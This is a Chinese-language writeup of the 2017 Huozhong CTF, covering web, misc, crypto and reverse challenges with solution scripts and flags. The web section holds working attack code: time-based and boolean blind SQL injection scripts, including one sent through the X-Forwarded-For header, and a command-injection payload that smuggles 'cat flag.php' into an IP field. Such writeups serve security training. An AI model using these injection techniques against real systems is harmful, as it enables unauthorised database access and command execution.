欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

2017 火种CTF Writeup

程序员文章站 2022-05-14 08:34:04
...

趁着周日的时间打了个小比赛。。。。

WEB

1 签到

直接关注就OK
key{welcome_to_anyuntec!}

2 一道简单的Web题

利用XFF注入
猜测后台逻辑是一个insert注入

$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);

那么我们可以进行注入了
贴上注入脚本

#!/usr/bin/env python2
# -*-coding:utf-8-*-
import requests
import string
url="http://aim.zhugeaq.com:82"
guess='1234567890abcdeflg{}'
flag=""
for i in range(1,100):
   for str in guess:
     headers={"x-forwarded-for":"xx'+"+"(select case when (ascii(substring((select flag from flag ) from %d for 1 ))=%d) then sleep(5) else 1 end ) and '1'='1" %(i,ord(str))}
     res=requests.get(url,headers=headers)
     sec=res.elapsed.seconds
     if sec > 4:
         flag = flag + str
         print flag
         break
print   flag

flag{4c9551d5be5612f7bb5d286785}

3 猜猜我在哪里

robots.txt找到要访问index.txt

    <?php
    if (empty($_GET["file"])){
        echo('../flag.php');
        return;
    }
    else{
        $filename='pages/'.(isset($_GET["file])?$_GET["file"]:"welcome.txt").'.html';
        include $filename;
    }
    ?>

2017 火种CTF Writeup

4 前端跑路了QAQ

index.txt 查看源码

    <?php 
    $ip = isset($_POST['ip'])?$_POST['ip']:die();
    if(!preg_match('/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/i',$ip)){
        die("ip 格式错误!");
    }
    echo strlen($ip);
    if(strlen($ip)<7||strlen($ip)>21){
        die("ip 长度错误!");
    }
        // Determine OS and execute the ping command.
    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
            // Windows
        $cmd = shell_exec( 'ping  ' .$ip );
    }else {
            // *nix
            $cmd = shell_exec( 'ping  -c 1 ' .$ip );
    }
        // Feedback for the end user
    echo  "<pre>{$cmd}</pre>";

这里ip的长度限制为25之内给了我们可乘之机
通过构造
ip=0.0.0.1%0acat flag.php
2017 火种CTF Writeup

5 你看到我的密码了嘛

一道基本的注入题目
发现过滤了一些东西

information limit () 

这里主要是过滤了()不能通过正常的注入
2017 火种CTF Writeup
在本地测试可以得到字段名
2017 火种CTF Writeup
尝试利用order by注入


import requests
url="http://aim.zhugeaq.com:83/index.php"
string = ''
for i in range(1,33):
    for j in range(33,127):
        string += chr(j)
        data = {
        'username':"admin_r' union select 1,2,'{}' order by 3#".format(string),
        'password':"admin"
        }
        s=requests.post(url=url,data=data)
        content=s.content
        print chr(j),'|',string
        string = string[:-1]
        if 'admin_r' in content:
            string += chr(j-1)
            print string,"***************************************"
            break

    print string

FLAG{93FCFF2AF3914F7}

6 一道很难的Web题

考察基本的注入知识

black: where & and  order limit sleep

white: union select from , # -- ascii = substr
# coding:utf-8
import requests
url = 'http://aim.zhugeaq.com:85/01/login.php'
dic = '1234567890abcdef'
string = ""
for i in range(2,34):
    for j in dic:
        payload = "1'/1=(ascii(substr((pass)from(1)-{}))={})/'1'='1".format(i,ord(j))
        data = {
            'username':payload,
            'pass':'1'
        }
        re = requests.post(url=url,data=data)
        if "用户名错误" in re.content:
            string += j
            print string
print string[::-1]

d1c46106fdda5b257a9f8bf503747fe4
利用md5解密:aaa@qq.com#123
flag{b9b0b759ad3e8a5129044c115e042c59}

MISC

1.截获了一个文件

a2V5ezIwMTZfa2V5X2hlbHB9==
Base64解密
key{2016_key_help}

2.这是什么

明显是unicode
2017 火种CTF Writeup

3.Keyboard

    #jrecbi]gyu8
    e.u pry(owRuuo.yQ)S
        e.u {pry(jd)S
            ypfS
                aoj ] rpe(jd)
            .qj.lyS
                p.ygpb jd
            cu (aoj V 96) abe (aoj W 123)S
                p.ygpb jdp((aoj[97}Ruuo.yQ)v{{mre{{(26) } 97)
            .ncu (aoj V 64) abe (aoj V 91)S
                p.ygpb jdp((aoj[65}Ruuo.yQ)v{{mre{{(26) } 65)
            .no.S
                p.ygpb jd
        p.ygpb --vhrcb(/{pry( j ) urp j cb o=)
    lpcby pry( -qpn?popbpo.+-w 13 )

rot13加密
最后找到对应加密qpn?popbpo.+ -> xrl{rsrnrse}
绕后直接ROT13转换
key{efeaeffr}

CRYPTO

解密1

2017 火种CTF Writeup

解密2

base64解密
Tk5TWFM2M0pPTlJXR1kzR09KVEdPNURCTVZUR0NaM1NOQjJIMj09PQ==
base32解密
NNSXS63JONRWGY3GOJTGO5DBMVTGCZ3SNB2H2===

key{iscccfrfgtaefagrht}

解密4

想着应该是异或
写了个脚本

    s1 = [0b00000010,0b00001000,0b00011010,0b00000110,0b00001010]
    s2 = 'large'
    flag = ''
    for i in range(5):
        flag += chr(s1[i]^ord(s2[i]))
    print flag

解密5

e6Z9i~]8R~U~QHE{RnY{QXg~QnQ{^XVlRXlp^XI5Q6Q6SKY8jUAA
凯撒移位范围大点就可以
a2V5ezY4NzQzMDAwNjUwMTczMjMwZTRhNThlZTE1M2M2OGU4fQ==
解密
key{68743000650173230e4a58ee153c68e8}

解密6

md5碰撞

import random
import string
def md5(str):
    import hashlib
    m = hashlib.md5()
    m.update(str)
    return m.hexdigest()
while 1:
    string = ''
    s = string.join(random.sample('qwertyuiopasdfghjklzxcvbnm1234567890',4))
    if md5(s)[0:10] == 'd9ddd1800f':
        print s
        break 

d9ddd1800fb812bd62e3fc55c35599b0

REVERSE

***去哪儿了

首先说了username是anyuntec
利用IDA找到了关键函数

 for  ( i =  0; i <  (signed  int)strlen(&String);  ++i )
{
if  (  *(&v7 + i)  != i +  *(&String  + i)  - strlen(&String)  )
break;
 }

最后写出逆向脚本

str1 =  'anyuntec'
str2 =  ''
for i in range(len(str1)):
    str2 += chr(ord(str1[i])  + i - len(str1))
print str2

简单的PE逆向

***** my apk~

通过JEB反编译,检查逻辑.
用户名是Tenshine
flag是首先md5,然后隔位取字符
用户名md5:
b9c77224ff234f27ac6badf83b855c76
得到flag:
flag{bc72f242a6af3857}

re300

利用PEID查看程序,是win32 GUI 程序, Delphi编写。利用ida分析
2017 火种CTF Writeup
发现有createthread,怀疑是子线程检测
定位到这
2017 火种CTF Writeup
利用OD动态查看
2017 火种CTF Writeup
找到了子线程的函数地址0x409134
下断点寻找处理函数ctrl+F7跟踪,跟踪到了下面的函数
2017 火种CTF Writeup
利用IDA查看
2017 火种CTF Writeup

发现了加密函数

__int64 __fastcall sub_5C5054(__int64 a1, int a2, signed int a3)
{
  char *v3; // aaa@qq.com
  int v4; // aaa@qq.com
  char v5; // aaa@qq.com
  signed int v6; // aaa@qq.com
  char v7; // aaa@qq.com
  char v8; // aaa@qq.com
  __int64 v10; // [sp-20h] [bp-30h]@1
  unsigned int v11; // [sp+0h] [bp-10h]@1
  char v12; // [sp+7h] [bp-9h]@1
  int v13; // [sp+8h] [bp-8h]@1
  int v14; // [sp+Ch] [bp-4h]@1

  v13 = a2;
  v11 = HIDWORD(a1);
  v14 = a1;
  v10 = a1;
  v3 = (char *)a1;
  v4 = v13;
  v12 = 0;
  v5 = 0;
  v6 = 0;
  while ( v6 <= v11 )
  {
    v7 = *v3;
    *v3 ^= 0x78u;
    *v3 ^= 5u;
    *v3 ^= 0x27u;
    *v3 ^= v6++;
    v5 += v12;
    *v3 ^= v5;
    v8 = *(_BYTE *)v4++;
    *v3 ^= v8;
    ++v3;
    v12 = v7;
    if ( !(v6 % a3) )
      v4 = v13;
  }
  return v10;
}

这是比对函数
2017 火种CTF Writeup
这是内存比对
2017 火种CTF Writeup

# -*- coding:utf-8 -*-
a = [0x53 ,0x22 ,0x9B ,0x18 ,0xDB ,0x70 ,0xD0 ,0x40 ,0x2A ,0xD2 ,0x2F ,0xCA ,0xA4 ,0x11 ,0xC8 ,0xA5, 
0x1D ,0xFD ,0x39 ,0x59 ,0x97 ,0x68 ,0x39 ,0xF5 ,0x94 ,0x45 ,0x07 ,0x2E ,0xA0 ,0x1D ,0x23 ,0x9D ]

b = [0x62 ,0x77, 0x6A, 0x73, 0x37 ,0x4D, 0x6E ,0x66, 0x61, 0x39, 0x55 ,0x78 ,0x78 ,0x6B, 0x61, 0x6E,  
0x53 ,0x22, 0x9B, 0x18, 0xDB ,0x70, 0xD0 ,0x40, 0x2A, 0xD2, 0x2F ,0xCA ,0xA4 ,0x11, 0xC8, 0xA5,  
0x1D ,0xFD, 0x39, 0x59, 0x97 ,0x68, 0x39 ,0xF5, 0x94, 0x45, 0x07 ,0x2E ,0xA0 ,0x1D, 0x23, 0x9D] 

# print(b)
v5 = 0
v7 = 0
s = ""
for i in range(len(a)):
    a[i]^=b[i]
    v5 +=v7
    if v5>255:
        v5 = v5&255
    a[i]^=v5
    a[i]^=i
    a[i]^=0x27
    a[i]^=0x5
    a[i]^=0x78
    v7 = a[i]
    if (i+1)%16==0:
        for j in range(7):
            b[i+j+1] = b[j] 
print s.join([chr(i) for i in a])

key{vXpybehIyAPcUt28}

相关标签: writeup